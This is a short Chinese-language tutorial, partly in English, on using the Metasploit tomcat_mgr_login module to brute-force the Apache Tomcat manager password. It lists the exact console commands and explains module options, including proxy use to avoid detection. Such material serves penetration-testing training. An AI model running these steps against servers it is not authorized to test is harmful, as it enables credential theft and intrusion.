本文使用 Metasploit module 去执行一个对Tomcat服务器的字典攻击,用来获取管理后台的密码。
msfdb init
msfdb start
- 启动Metasploit的控制台:
- 加载模块:tomcat_mgr_login
use auxiliary/scanner/http/tomcat_mgr_login
- 查看可用参数
show options
- 设置目标机器IP:
set rhosts
- 通过添加线程数,可以加速任务,这里我们设置为 5:
set threads 5
- 如果暴力破解速度过快,服务器会应为短时间内接收大量请求而崩溃,这里我们降低速度:
set bruteforce_speed 3
- 其他配置保持默认,使用默认字典,开始执行:
如图,绿色 + 号开头的那个,就是找到的匹配密码
/manager/html,这个应用使用HTTP认证。Metasploit 辅助模块(tomcat_mgr_login)中的一些配置,说明如下:
- BLANK_PASSWORDS: Adds a test with blank password for every user tried
- PASSWORD: It's useful if we want to test a single password with multiple users or to add a specific one not included in the list
- PASS_FILE: The password list we will use for the test
- Proxies: This is the option we need to configure if we need to go through a proxy to reach our target or to avoid detection
- RHOSTS: The host, hosts (separated by spaces), or file with hosts (file:/path/to/file/with/hosts) we want to test.
- RHOSTS: The host, hosts (separated by spaces), or file with hosts (file:/path/to/file/with/hosts) we want to test
- STOP_ON_SUCCESS: Stop trying a host when a valid password is found in it
- TARGERURI: Location of the manager application inside the host
- USERNAME: Define a specific username to test, it can be tested alone or added to the list defined in USER_FILE